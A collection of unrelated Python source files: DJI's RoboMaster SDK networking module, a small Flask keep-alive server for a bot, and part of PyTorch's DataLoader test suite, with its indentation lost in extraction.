runs -= 1
print("[*] Closed")
|
conn.py
|
# -*-coding:utf-8-*-
# Copyright (c) 2020 DJI.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License in the file LICENSE.txt or at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import socket
import binascii
import traceback
import threading
import queue
import random
import time
import base64
import errno
from ftplib import FTP
from . import algo
from . import protocol
from . import logger
from . import config
CONNECTION_USB_RNDIS = 'rndis'
CONNECTION_WIFI_AP = 'ap'
CONNECTION_WIFI_STA = 'sta'
CONNECTION_PROTO_TCP = 'tcp'
CONNECTION_PROTO_UDP = 'udp'
__all__ = ['Connection']
def get_local_ip():
"""
获取本地ip地址
:return:返回本地ip
"""
return socket.gethostbyname(socket.gethostname())
def get_sn_form_data(data):
""" 从 data 中获取 sn 字段
:param data:
:return:
"""
data = data.split(b'\x00')
recv_sn = data[0]
recv_sn = recv_sn.decode(encoding='utf-8')
return recv_sn
def scan_robot_ip(user_sn=None, timeout=3.0):
""" 扫描机器人的IP地址
:return: 机器人的IP地址
"""
try:
# if user specifies SN
if user_sn:
# check the validity of input SN
if config.ROBOT_SN_LEN != len(user_sn):
raise Exception("The length of SN is invalid!")
find_robot = False
robot_ip = None
start = time.time()
while not find_robot:
end = time.time()
if end - start > timeout:
break
try:
s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
s.bind(("0.0.0.0", config.ROBOT_BROADCAST_PORT))
s.settimeout(1)
data, ip = s.recvfrom(1024)
recv_sn = get_sn_form_data(data)
logger.info("conn: scan_robot_ip, data:{0}, ip:{1}".format(recv_sn, ip))
if recv_sn == user_sn:
robot_ip = ip[0]
find_robot = True
except socket.error as error:
# If multiple processes trying to connected to different
# RoboMasters are started at the same time, the socket will
# not be able to bind. In that case, try again until timeout.
if not error.errno == errno.EADDRINUSE:
raise
if robot_ip:
return robot_ip
else:
logger.error("Cannot found robot based on the specified SN!")
return None
else:
# for compatibility with previous versions.
config.ROBOT_BROADCAST_PORT = 45678
s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
s.bind(("0.0.0.0", config.ROBOT_BROADCAST_PORT))
s.settimeout(timeout)
data, ip = s.recvfrom(1024)
logger.info("conn: scan_robot_ip, data:{0}, ip:{1}".format(binascii.hexlify(data), ip))
return ip[0]
except Exception as e:
logger.error("scan_robot_ip: exception {0}".format(e))
return None
def scan_robot_ip_list(timeout=3.0):
""" 扫描局域网内的机器人IP地址
:param timeout: 超时时间
:return: list,扫描到的小车IP列表
"""
ip_list = []
try:
s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
s.bind(("0.0.0.0", config.ROBOT_BROADCAST_PORT))
except Exception as e:
logger.warning("scan_robot_ip_list: exception {0}".format(e))
return ip_list
start = time.time()
while True:
end = time.time()
if end-start > timeout:
break
s.settimeout(1)
try:
data, ip = s.recvfrom(1024)
except Exception as e:
logger.warning("scan_robot_ip_list: socket recv, {0}".format(e))
continue
logger.info("conn: scan_robot_ip, data:{0}, ip:{1}".format(data[:-1].decode(encoding='utf-8'), ip))
if ip[0] not in ip_list:
ip_list.append(ip[0])
logger.info("conn: scan_robot_ip_list, ip_list:{0}".format(ip_list))
print("find robot sn:{0}, ip:{1}".format(str(data[:-1].decode(encoding='utf-8')), ip[0]))
return ip_list
class BaseConnection(object):
def __init__(self):
self._sock = None
self._buf = bytearray()
self._host_addr = None
self._target_addr = None
self._proto_type = None
self._proto = None
def create(self):
try:
if self._proto_type == CONNECTION_PROTO_TCP:
self._sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
self._sock.bind(self._host_addr)
self._sock.connect(self._target_addr)
logger.info("TcpConnection, connect success {0}".format(self._host_addr))
elif self._proto_type == CONNECTION_PROTO_UDP:
self._sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
self._sock.bind(self._host_addr)
logger.info("UdpConnection, bind {0}".format(self._host_addr))
else:
logger.error("Connection: {0} unexpected connection param set".format(self._proto_type))
except Exception as e:
logger.warning("udpConnection: create, host_addr:{0}, exception:{1}".format(self._host_addr, e))
raise
def close(self):
if self._sock:
self._sock.close()
def recv(self):
try:
if self._sock:
data, host = self._sock.recvfrom(2048)
except Exception as e:
logger.warning("Connection: recv, exception:{0}".format(e))
raise
if data is None:
logger.warning("Connection: recv buff None.")
return None
self._buf.extend(data)
if len(self._buf) == 0:
logger.warning("Connection: recv buff None.")
return None
msg, self._buf = protocol.decode_msg(self._buf, self._proto)
if not msg:
logger.warning("Connection: protocol.decode_msg is None.")
return None
else:
if isinstance(msg, protocol.MsgBase):
if not msg.unpack_protocol():
logger.warning("Connection: recv, msg.unpack_protocol failed, msg:{0}".format(msg))
return msg
def send(self, buf):
try:
if self._sock:
self._sock.sendto(buf, self._target_addr)
except Exception as e:
logger.warning("Connection: send, exception:{0}".format(e))
raise
def send_self(self, buf):
try:
if self._sock:
self._sock.sendto(buf, self._host_addr)
except Exception as e:
logger.warning("Connection: send, exception:{0}".format(e))
raise
class Connection(BaseConnection):
def __init__(self, host_addr, target_addr, proto="v1", protocol=CONNECTION_PROTO_UDP):
self._host_addr = host_addr
self._target_addr = target_addr
self._proto = proto
self._proto_type = protocol
self._sock = None
self._buf = bytearray()
def __repr__(self):
return "Connection, host:{0}, target:{1}".format(self._host_addr, self._target_addr)
@property
def target_addr(self):
return self._target_addr
@property
def protocol(self):
return self._proto
class SdkConnection(BaseConnection):
def __init__(self):
self._sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
self._sock.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
def __del__(self):
self.close()
def switch_remote_route(self, msg, remote_addr, timeout=5):
if not self._sock:
return False, None
buf = msg.pack()
try:
self._sock.settimeout(timeout)
self._sock.sendto(buf, remote_addr)
self._sock.settimeout(timeout)
data, address = self._sock.recvfrom(1024)
logger.debug("SdkConnection, data:{0}.".format(binascii.hexlify(data)))
resp_msg, data = protocol.decode_msg(data)
resp_msg.unpack_protocol()
if resp_msg:
prot = resp_msg.get_proto()
if prot._retcode == 0:
if prot._state == 0:
logger.info("SdkConnection: accept connection.")
if prot._state == 1:
logger.error("SdkConnection: reject connection, service is busy!")
return False, None
if prot._state == 2:
logger.info("SdkConnection: got config ip:{0}".format(prot._config_ip))
return True, prot._config_ip
except socket.timeout:
logger.error("SdkConnection: RECV TimeOut!")
raise
except Exception as e:
logger.warning("SdkConnection: switch_remote_route, exception:{0}, Please Check Connections.".format(e))
logger.warning("SdkConnection:{0}".format(traceback.format_exc()))
return False, None
def request_connection(self, sdk_host, conn_type=None, proto_type=None, sn=None):
if conn_type is None:
logger.error("Not Specific conn_type!")
logger.info("CONN TYPE is {0}".format(conn_type))
local_addr = None
remote_addr = None
proto = protocol.ProtoSetSdkConnection()
if conn_type is CONNECTION_WIFI_AP:
proto._connection = 0
if config.LOCAL_IP_STR:
proto._ip = config.LOCAL_IP_STR
else:
proto._ip = '0.0.0.0'
logger.info("Robot: request_connection, ap get local ip:{0}".format(proto._ip))
proto._port = random.randint(config.ROBOT_SDK_PORT_MIN, config.ROBOT_SDK_PORT_MAX)
proxy_addr = (config.ROBOT_DEFAULT_WIFI_ADDR[0], config.ROBOT_PROXY_PORT)
remote_addr = config.ROBOT_DEFAULT_WIFI_ADDR
local_addr = (proto._ip, proto._port)
elif conn_type is CONNECTION_WIFI_STA:
proto._connection = 1
local_ip = '0.0.0.0'
if config.LOCAL_IP_STR:
local_ip = config.LOCAL_IP_STR
proto.ip = local_ip
proto._port = random.randint(config.ROBOT_SDK_PORT_MIN, config.ROBOT_SDK_PORT_MAX)
logger.info("SdkConnection: request_connection with ip:{0}, port:{1}".format(local_ip, proto._port))
if config.ROBOT_IP_STR:
remote_ip = config.ROBOT_IP_STR
else:
remote_ip = scan_robot_ip(sn)
if not remote_ip:
return False, None, None
local_addr = (local_ip, proto._port)
remote_addr = (remote_ip, config.ROBOT_DEVICE_PORT)
proxy_addr = (remote_ip, config.ROBOT_PROXY_PORT)
elif conn_type is CONNECTION_USB_RNDIS:
proto._connection = 2
proto._ip = config.ROBOT_DEFAULT_LOCAL_RNDIS_ADDR[0]
proto._port = random.randint(config.ROBOT_SDK_PORT_MIN,
config.ROBOT_SDK_PORT_MAX)
proxy_addr = (config.ROBOT_DEFAULT_RNDIS_ADDR[0], config.ROBOT_PROXY_PORT)
local_addr = (config.ROBOT_DEFAULT_LOCAL_RNDIS_ADDR[0], proto._port)
remote_addr = config.ROBOT_DEFAULT_RNDIS_ADDR
logger.info("SdkConnection: request_connection, local addr {0}, remote_addr {1}, "
"proxy addr {2}".format(local_addr, remote_addr, proxy_addr))
proto._host = sdk_host
if proto_type == CONNECTION_PROTO_TCP:
proto._protocol = 1
else:
proto._protocol = 0
msg = protocol.Msg(sdk_host, protocol.host2byte(9, 0), proto)
try:
result, local_ip = self.switch_remote_route(msg, proxy_addr)
if result:
if config.LOCAL_IP_STR:
local_ip = config.LOCAL_IP_STR
local_addr = (local_ip, proto._port)
else:
return False, local_addr, remote_addr
return result, local_addr, remote_addr
except socket.timeout:
logger.warning("SdkConnection: Connection Failed, please check hareware connections!!!")
return False, local_addr, remote_addr
except Exception as e:
logger.warning("SdkConnection: request_connection, switch_remote_route exception {0}".format(str(e)))
return False, local_addr, remote_addr
class StreamConnection(object):
def __init__(self):
self._sock = None
self._sock_queue = queue.Queue(32)
self._sock_recv = None
self._recv_count = 0
self._receiving = False
def __del__(self):
if self._sock:
self._sock.close()
def connect(self, addr, ip_proto="tcp"):
try:
if ip_proto == "tcp":
self._sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
self._sock.settimeout(3)
logger.info("StreamConnection: try to connect {0}".format(addr))
time.sleep(0.1)
self._sock.connect(addr)
elif ip_proto == "udp":
self._sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
self._sock.bind(addr)
else:
logger.error("StreamConnection: ip_proto:{0} not supperted.".format(ip_proto))
except Exception as e:
logger.error("StreamConnection: connect addr {0}, exception {1}".format(addr, e))
return False
self._sock_recv = threading.Thread(target=self._recv_task)
self._sock_recv.start()
logger.info("StreamConnection {0} successfully!".format(addr))
return True
def disconnect(self):
self._receiving = False
self._sock_queue.put(None)
if self._sock_recv:
self._sock_recv.join()
self._sock.close()
self._sock_queue.queue.clear()
self._recv_count = 0
logger.info("StreamConnection: disconnected")
def _recv_task(self):
self._receiving = True
logger.info("StreamConnection: _recv_task, Start to receiving Data...")
while self._receiving:
try:
if self._sock is None:
break
data, addr = self._sock.recvfrom(4096)
if not self._receiving:
break
self._recv_count += 1
if self._sock_queue.full():
logger.warning("StreamConnection: _recv_task, sock_data_queue is full.")
self._sock_queue.get()
else:
logger.debug("StreamConnection: _recv_task, recv {0}, len:{1}, data:{2}".format(
self._recv_count, len(data), data))
self._sock_queue.put(data)
except socket.timeout:
logger.warning("StreamConnection: _recv_task, recv data timeout!")
continue
except Exception as e:
logger.error("StreamConnection: recv, exceptions:{0}".format(e))
self._receiving = False
return
def read_buf(self, timeout=2):
try:
buf = self._sock_queue.get(timeout=timeout)
return buf
except Exception as e:
logger.warning("StreamConnection: read_buf, exception {0}".format(e))
return None
class ConnectionHelper:
def __init__(self):
self._appid = str(random.randint(10000, 20000))
self._ssid = ""
self._password = ""
self._sta_info = protocol.STAConnInfo()
def build_qrcode_string(self, ssid="", password=""):
self._ssid = ssid
self._password = password
self._sta_info.set_info(ssid, password, self._appid)
buf = self._sta_info.pack()
buf = algo.simple_encrypt(buf)
return bytes.decode(base64.b64encode(buf), encoding='utf-8')
def get_qrcode_string(self):
buf = self._sta_info.pack()
buf = algo.simple_encrypt(buf)
return bytes.decode(base64.b64encode(buf), encoding='utf-8')
def wait_for_connection(self):
try:
config.ROBOT_BROADCAST_PORT = 45678
s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
s.bind(("0.0.0.0", config.ROBOT_BROADCAST_PORT))
s.settimeout(360)
logger.info("waiting for connections...")
while True:
data, ip = s.recvfrom(1024)
if data:
decode_buf = algo.simple_encrypt(data)
conn_info = protocol.STAConnInfo()
if conn_info.unpack(decode_buf):
if conn_info._recv_appid == self._appid:
s.sendto(self._appid.encode(encoding='utf-8'), ip)
return True
else:
logger.debug("skip data!")
else:
logger.warning("wait_for_connection unpack failed!")
except Exception as e:
logger.warning("recv_task: exception {0}".format(e))
return False
class FtpConnection:
def __init__(self):
self._ftp = FTP()
self._target = None
self._bufsize = 1024
self._ftp.set_debuglevel(0)
def connect(self, ip):
self._target = ip
logger.info("FtpConnection: connect ip: {0}".format(ip))
return self._ftp.connect(ip, 21)
def upload(self, src_file, target_file):
try:
fp = open(src_file, 'rb')
self._ftp.storbinary("STOR " + target_file, fp, self._bufsize)
fp.close()
except Exception as e:
logger.warning("FtpConnection: upload e {0}".format(e))
def stop(self):
if self._ftp:
self._ftp.close()
|
keep_alive.py
|
from flask import Flask
from threading import Thread
app = Flask('')
# --------------------------------------------------------
# handlers
# --------------------------------------------------------
@app.route('/')
def home():
return "Proctor bot is live!"
# ========================================================
# Initialize server
# ========================================================
def run():
app.run(host='0.0.0.0', port=8080)
# ========================================================
# Initialize server thread
# ========================================================
def keep_alive():
thread = Thread(target=run)
thread.start()
|
test_dataloader.py
|
import math
import sys
import errno
import os
import ctypes
import faulthandler
import torch
import gc
import time
import signal
import unittest
import itertools
import warnings
import tempfile
from torch import multiprocessing as mp
from torch.utils.data import _utils, Dataset, IterableDataset, TensorDataset, DataLoader, ConcatDataset, ChainDataset, Subset
from torch.utils.data._utils import MP_STATUS_CHECK_INTERVAL
from torch.utils.data.dataset import random_split
from torch._utils import ExceptionWrapper
from torch.testing._internal.common_utils import (TestCase, run_tests, TEST_NUMPY, IS_WINDOWS,
IS_PYTORCH_CI, NO_MULTIPROCESSING_SPAWN, skipIfRocm, slowTest,
load_tests, TEST_WITH_TSAN, IS_SANDCASTLE)
try:
import psutil
HAS_PSUTIL = True
except ImportError:
HAS_PSUTIL = False
err_msg = ("psutil not found. Some critical data loader tests relying on it "
"(e.g., TestDataLoader.test_proper_exit) will not run.")
if IS_PYTORCH_CI:
raise ImportError(err_msg) from None
else:
warnings.warn(err_msg)
# load_tests from torch.testing._internal.common_utils is used to automatically filter tests for
# sharding on sandcastle. This line silences flake warnings
load_tests = load_tests
# We cannot import TEST_CUDA from torch.testing._internal.common_cuda here, because if we do that,
# the TEST_CUDNN line from torch.testing._internal.common_cuda will be executed multiple times
# as well during the execution of this test suite, and it will cause
# CUDA OOM error on Windows.
TEST_CUDA = torch.cuda.is_available()
if not NO_MULTIPROCESSING_SPAWN:
# We want to use `spawn` if able because some of our tests check that the
# data loader terminiates gracefully. To prevent hanging in the testing
# process, such data loaders are run in a separate subprocess.
#
# We also want to test the `pin_memory=True` configuration, thus `spawn` is
# required to launch such processes and they initialize the CUDA context.
#
# Mixing different start method is a recipe for disaster (e.g., using a fork
# `mp.Event` with a spawn `mp.Process` segfaults). So we set this globally
# to avoid bugs.
#
# Get a multiprocessing context because some test / third party library will
# set start_method when imported, and setting again triggers `RuntimeError`.
mp = mp.get_context(method='spawn')
# 60s of timeout?
# Yes, in environments where physical CPU resources are shared, e.g., CI, the
# time for a inter-process communication can be highly varying. With 15~17s of
# timeout, we have observed flakiness in some CI builds (see
# pytorch/pytorch#14501, pytorch/pytorch#16608). We follow the CPython
# multiprocessing setup and set the timeout to 60s here:
#
# https://github.com/python/cpython/blob/e8113f51a8bdf33188ee30a1c038a298329e7bfa/Lib/test/_test_multiprocessing.py#L73
JOIN_TIMEOUT = 60.0 # seconds
supported_multiprocessing_contexts = [None] + list(torch.multiprocessing.get_all_start_methods())
@unittest.skipIf(
TEST_WITH_TSAN,
"Fails with TSAN with the following error: starting new threads after multi-threaded "
"fork is not supported. Dying (set die_after_fork=0 to override)")
class TestDatasetRandomSplit(TestCase):
def test_lengths_must_equal_dataset_size(self):
with self.assertRaises(ValueError):
random_split([1, 2, 3, 4], [1, 2])
def test_splits_have_correct_size(self):
splits = random_split([1, 2, 3, 4, 5, 6], [2, 4])
self.assertEqual(len(splits), 2)
self.assertEqual(len(splits[0]), 2)
self.assertEqual(len(splits[1]), 4)
def test_splits_are_mutually_exclusive(self):
data = [5, 2, 3, 4, 1, 6]
splits = random_split(data, [2, 4])
all_values = []
all_values.extend(list(splits[0]))
all_values.extend(list(splits[1]))
data.sort()
all_values.sort()
self.assertListEqual(data, all_values)
def test_splits_indexing_type(self):
r"""Indices generated by random_split
should be of integer type
"""
class CustomDataset():
def __init__(self, test_object, custom_list):
self.data = custom_list
self.test_object = test_object
def __getitem__(self, key):
self.test_object.assertEqual(type(key), type(0))
return self.data[key]
def __len__(self):
return len(self.data)
x = [1, 2, 3, 4, 5]
dataset = CustomDataset(self, x)
dataset = random_split(dataset, [5])[0]
data_loader = DataLoader(dataset)
for batch in data_loader:
pass
def test_splits_reproducibility(self):
self.assertEqual(
[list(x) for x in random_split(range(10), [3, 7], generator=torch.Generator().manual_seed(1))],
[[5, 6, 1], [2, 0, 8, 9, 3, 7, 4]],
)
self.assertEqual(
random_split(range(100), [60, 40], generator=torch.Generator().manual_seed(42)),
random_split(range(100), [60, 40], generator=torch.Generator().manual_seed(42)),
)
def test_splits_generator(self):
# A random_split without a specific generator should affect the default one
state = torch.get_rng_state()
a = torch.rand(10)
torch.set_rng_state(state)
random_split(range(10), [5, 5])
b = torch.rand(10)
self.assertNotEqual(a, b)
# A random_split with a specific generator should not affect the default one
state = torch.get_rng_state()
a = torch.rand(10)
torch.set_rng_state(state)
random_split(range(10), [5, 5], generator=torch.Generator().manual_seed(42))
b = torch.rand(10)
self.assertEqual(a, b)
def test_slicing_of_subset_of_dataset(self):
# Testing slicing a subset initialized with a dataset
dataset = TensorDataset(torch.tensor([1, 2, 3, 4, 5]))
subset_of_dataset = Subset(dataset, [0, 1, 2, 3, 4])
self.assertEqual(subset_of_dataset[:], dataset[:])
self.assertEqual(subset_of_dataset[1:2], dataset[1:2])
self.assertEqual(subset_of_dataset[0:-1:2], dataset[0:-1:2])
# Testing slicing of subset from random split
subset1, subset2 = random_split(dataset, [3, 2])
self.assertEqual(subset1[:], dataset[subset1.indices[:]])
self.assertEqual(subset1[0:2], dataset[subset1.indices[0:2]])
self.assertEqual(subset1[0:-1:2], dataset[subset1.indices[0:-1:2]])
def test_slicing_of_subset_of_subset(self):
# Testing slicing a subset initialized with a subset
dataset = TensorDataset(torch.tensor([1, 2, 3, 4, 5]))
subset_of_dataset = Subset(dataset, [0, 1, 2, 3, 4])
subset_of_subset = Subset(subset_of_dataset, [0, 1, 2, 3, 4])
self.assertEqual(subset_of_subset[:], dataset[:])
self.assertEqual(subset_of_subset[0:2], dataset[0:2])
self.assertEqual(subset_of_subset[0:-1:2], dataset[0:-1:2])
# Testing slicing of subset of subset from random split
subset1, subset2 = random_split(dataset, [4, 1])
subset_of_subset1, subset_of_subset2 = random_split(subset1, [3, 1])
idx = [subset1.indices[i] for i in subset_of_subset1.indices]
self.assertEqual(subset_of_subset1[:], dataset[idx[:]])
self.assertEqual(subset_of_subset1[0:2], dataset[idx[0:2]])
self.assertEqual(subset_of_subset1[0:-1:2], dataset[idx[0:-1:2]])
class CUDACountingDataset(Dataset):
def __init__(self, n):
super(CUDACountingDataset, self).__init__()
self.n = n
def __getitem__(self, i):
return torch.as_tensor(i, device='cuda')
def __len__(self):
return self.n
class CountingDataset(Dataset):
def __init__(self, n):
super(CountingDataset, self).__init__()
self.n = n
def __getitem__(self, i):
return i
def __len__(self):
return self.n
class CountingIterableDataset(IterableDataset):
def __init__(self, n):
super(CountingIterableDataset, self).__init__()
self.n = n
def __iter__(self):
return iter(range(self.n))
def __len__(self):
return self.n
@unittest.skipIf(
TEST_WITH_TSAN,
"Fails with TSAN with the following error: starting new threads after multi-threaded "
"fork is not supported. Dying (set die_after_fork=0 to override)")
class TestTensorDataset(TestCase):
def test_len(self):
source = TensorDataset(torch.randn(15, 10, 2, 3, 4, 5), torch.randperm(15))
self.assertEqual(len(source), 15)
def test_getitem(self):
t = torch.randn(15, 10, 2, 3, 4, 5)
l = torch.randn(15, 10)
source = TensorDataset(t, l)
for i in range(15):
self.assertEqual(t[i], source[i][0])
self.assertEqual(l[i], source[i][1])
def test_getitem_1d(self):
t = torch.randn(15)
l = torch.randn(15)
source = TensorDataset(t, l)
for i in range(15):
self.assertEqual(t[i], source[i][0])
self.assertEqual(l[i], source[i][1])
def test_single_tensor(self):
t = torch.randn(5, 10)
source = TensorDataset(t)
self.assertEqual(len(source), 5)
for i in range(5):
self.assertEqual(t[i], source[i][0])
def test_many_tensors(self):
t0 = torch.randn(5, 10, 2, 3, 4, 5)
t1 = torch.randn(5, 10)
t2 = torch.randn(5, 10, 2, 5)
t3 = torch.randn(5, 10, 3, 7)
source = TensorDataset(t0, t1, t2, t3)
self.assertEqual(len(source), 5)
for i in range(5):
self.assertEqual(t0[i], source[i][0])
self.assertEqual(t1[i], source[i][1])
self.assertEqual(t2[i], source[i][2])
self.assertEqual(t3[i], source[i][3])
@unittest.skipIf(
TEST_WITH_TSAN,
"Fails with TSAN with the following error: starting new threads after multi-threaded "
"fork is not supported. Dying (set die_after_fork=0 to override)")
class TestConcatDataset(TestCase):
def test_concat_two_singletons(self):
result = ConcatDataset([[0], [1]])
self.assertEqual(2, len(result))
self.assertEqual(0, result[0])
self.assertEqual(1, result[1])
def test_concat_two_non_singletons(self):
result = ConcatDataset([[0, 1, 2, 3, 4],
[5, 6, 7, 8, 9]])
self.assertEqual(10, len(result))
self.assertEqual(0, result[0])
self.assertEqual(5, result[5])
def test_concat_two_non_singletons_with_empty(self):
# Adding an empty dataset somewhere is correctly handled
result = ConcatDataset([[0, 1, 2, 3, 4],
[],
[5, 6, 7, 8, 9]])
self.assertEqual(10, len(result))
self.assertEqual(0, result[0])
self.assertEqual(5, result[5])
def test_concat_raises_index_error(self):
result = ConcatDataset([[0, 1, 2, 3, 4],
[5, 6, 7, 8, 9]])
with self.assertRaises(IndexError):
# this one goes to 11
result[11]
def test_add_dataset(self):
d1 = TensorDataset(torch.rand(7, 3, 28, 28), torch.rand(7))
d2 = TensorDataset(torch.rand(7, 3, 28, 28), torch.rand(7))
d3 = TensorDataset(torch.rand(7, 3, 28, 28), torch.rand(7))
result = d1 + d2 + d3
self.assertEqual(21, len(result))
self.assertEqual(0, (d1[0][0] - result[0][0]).abs().sum())
self.assertEqual(0, (d2[0][0] - result[7][0]).abs().sum())
self.assertEqual(0, (d3[0][0] - result[14][0]).abs().sum())
def test_iterable_dataset_err(self):
d1 = TensorDataset(torch.rand(7, 3, 28, 28), torch.rand(7))
it1 = CountingIterableDataset(5)
it2 = CountingIterableDataset(10)
with self.assertRaisesRegex(AssertionError, "does not support IterableDataset"):
ConcatDataset([d1, it2, it1])
with self.assertRaisesRegex(AssertionError, "does not support IterableDataset"):
ConcatDataset([it2])
with self.assertRaisesRegex(AssertionError, "does not support IterableDataset"):
ConcatDataset([it1, d1])
# takes in dummy var so this can also be used as a `worker_init_fn`
def set_faulthander_if_available(_=None):
faulthandler.enable(sys.__stderr__)
if not IS_WINDOWS:
# windows does not have faulthandler.register
# chain=False prevents the default behavior of killing the process
faulthandler.register(signal.SIGUSR1, file=sys.__stderr__, chain=False)
set_faulthander_if_available()
# Process `pid` must have called `set_faulthander_if_available`
def print_traces_of_all_threads(pid):
if not IS_WINDOWS:
# use the custom signal if available
os.kill(pid, signal.SIGUSR1)
else:
# otherwise we can still use the handler given by faulthandler.enable()
# at the cost of killing the process.
os.kill(pid, signal.SIGSEGV)
# wait in parent process to give subprocess some time to print
time.sleep(5)
# The following `ErrorTrackingProcess` stores the first encountered exception in
# its `.exception` attribute.
# Inspired by https://stackoverflow.com/a/33599967
class ErrorTrackingProcess(mp.Process):
# Why no *args?
# py2 doesn't support def fn(x, *args, key=val, **kwargs)
# Setting disable_stderr=True may generate a lot of unrelated error outputs
# but could be helpful for debugging.
def __init__(self, disable_stderr=True, **kwargs):
super(ErrorTrackingProcess, self).__init__(**kwargs)
self._pconn, self._cconn = mp.Pipe()
self._exception = None
self.disable_stderr = disable_stderr
def run(self):
set_faulthander_if_available()
if self.disable_stderr:
# Disable polluting stderr with errors that are supposed to happen.
with open(os.devnull, 'w') as devnull:
os.dup2(devnull.fileno(), sys.stderr.fileno())
try:
super(ErrorTrackingProcess, self).run()
self._cconn.send(None)
except Exception:
self._cconn.send(ExceptionWrapper(sys.exc_info()))
raise
def print_traces_of_all_threads(self):
assert self.is_alive(), "can only use print_traces_of_all_threads if the process is alive"
assert not self.disable_stderr, "do not disable stderr if you use print_traces_of_all_threads"
# On platforms without `SIGUSR1`, `set_faulthander_if_available` sets
# `faulthandler.enable()`, and `print_traces_of_all_threads` may kill
# the process. So let's poll the exception first
_ = self.exception
print_traces_of_all_threads(self.pid)
@property
def exception(self):
if self._pconn.poll():
self._exception = self._pconn.recv()
if self._exception is None:
return None
else:
return self._exception.exc_type(self._exception.exc_msg)
# ESRCH means that os.kill can't finds alive proc
def send_signal(self, signum, ignore_ESRCH=False):
try:
os.kill(self.pid, signum)
except OSError as e:
if not ignore_ESRCH or e.errno != errno.ESRCH:
raise
class ErrorDataset(Dataset):
def __init__(self, size):
self.size = size
def __len__(self):
return self.size
class SegfaultDataset(Dataset):
def __init__(self, size):
self.size = size
def __getitem__(self, idx):
return ctypes.string_at(0)
def __len__(self):
return self.size
class SleepDataset(Dataset):
def __init__(self, size, sleep_sec):
self.size = size
self.sleep_sec = sleep_sec
self.sleeped = False
def __getitem__(self, idx):
if not self.sleeped:
time.sleep(self.sleep_sec)
self.sleeped = True
return idx
def __len__(self):
return self.size
class SeedDataset(Dataset):
def __init__(self, size):
self.size = size
def __getitem__(self, idx):
return torch.initial_seed()
def __len__(self):
return self.size
class WorkerSpecificIterableDataset(IterableDataset):
def __init__(self, sizes_for_all_workers):
self.sizes_for_all_workers = sizes_for_all_workers
def __iter__(self):
worker_info = torch.utils.data.get_worker_info()
assert worker_info is not None
return iter(range(self.sizes_for_all_workers[worker_info.id]))
def __len__(self):
return sum(self.sizes_for_all_workers)
# Inspired by https://stackoverflow.com/a/26703365
# If all workers will call `sync_once`, they will be blocked until all workers
# reach the call (i.e., acting like a barrier).
# This can be used to ensure that each worker at least processes one data.
class SynchronizedDataset(Dataset):
def __init__(self, size, batch_size, num_workers):
assert size >= num_workers * batch_size
self.count = mp.Value('i', 0, lock=True)
self.barrier = mp.Semaphore(0)
self.num_workers = num_workers
self.size = size
def sync_once(self):
with self.count.get_lock():
self.count.value += 1
if self.count.value == self.num_workers:
self.barrier.release()
self.barrier.acquire()
self.barrier.release()
def __getitem__(self, idx):
raise NotImplementedError
def __len__(self):
return self.size
class EmptyTensorDataset(torch.utils.data.Dataset):
def __init__(self, len):
self.len = len
def __len__(self):
return self.len
def __getitem__(self, any):
return torch.empty(0)
class SynchronizedSeedDataset(SynchronizedDataset):
def __getitem__(self, idx):
self.sync_once()
return torch.initial_seed()
def _test_timeout(persistent_workers):
dataset = SleepDataset(10, 3)
dataloader = DataLoader(dataset, batch_size=2, num_workers=2, timeout=1,
persistent_workers=persistent_workers)
_ = next(iter(dataloader))
def _test_timeout_pin_memory(persistent_workers):
dataset = SleepDataset(10, 3)
dataloader = DataLoader(dataset, batch_size=2, num_workers=2, timeout=1, pin_memory=True,
persistent_workers=persistent_workers)
_ = next(iter(dataloader))
def _test_large_sampler_indices(persistent_workers):
# See
# test_large_sampler_indices
# https://github.com/pytorch/pytorch/issues/48666
dataloader = torch.utils.data.DataLoader(
EmptyTensorDataset(10000000),
batch_size=40960,
persistent_workers=persistent_workers,
num_workers=1)
it = iter(dataloader)
for x in it:
assert x.numel() == 0
raise RuntimeError('My Error')
def disable_stderr(worker_id):
r"""
Avoids printing "ERROR: Unexpected segmentation fault encountered in worker."
from workers. Since worker signal handler prints with low-level write(),
this has to be done on OS level via dup.
This is used as worker_init_fn for test_segfault.
"""
sys.stderr.flush() # flush library buffers that dup2 knows nothing about
# Can't use a with-block because otherwise the fd will be closed when this
# function ends.
with open(os.devnull, 'w') as devnull:
os.dup2(devnull.fileno(), sys.stderr.fileno())
def _test_segfault():
dataset = SegfaultDataset(10)
dataloader = DataLoader(dataset, batch_size=2, num_workers=2, worker_init_fn=disable_stderr)
_ = next(iter(dataloader))
def _test_no_segfault():
dataset = [1, 2, 3]
num_threads = torch.get_num_threads()
if num_threads < 4:
torch.set_num_threads(4)
else:
torch.set_num_threads(num_threads)
mp_ctx = torch.multiprocessing.get_context(method='fork')
dataloader = DataLoader(dataset, num_workers=1, worker_init_fn=disable_stderr,
multiprocessing_context=mp_ctx)
_ = next(iter(dataloader))
class TestProperExitDataset(Dataset):
def __init__(self, size, error_event):
self.size = size
self.error_event = error_event
def __len__(self):
return self.size
def __getitem__(self, idx):
worker_info = torch.utils.data.get_worker_info()
if self.error_event is not None and self.error_event.is_set() and \
worker_info.id == worker_info.num_workers - 1:
# only error in the last worker
raise RuntimeError('Worker error')
return torch.tensor([idx])
class TestProperExitIterableDataset(IterableDataset):
def __init__(self, size, error_event):
self.error_event = error_event
self.size = size
self.remaining = size
def __len__(self):
return self.size
def __iter__(self):
return self
def __next__(self):
worker_info = torch.utils.data.get_worker_info()
if self.error_event is not None and self.error_event.is_set() and \
worker_info.id == worker_info.num_workers - 1:
# only error in the last worker
raise RuntimeError('Worker error')
self.remaining -= 1
if self.remaining < 0:
raise StopIteration
return torch.tensor(-1000)
next = __next__ # py2 compatibility
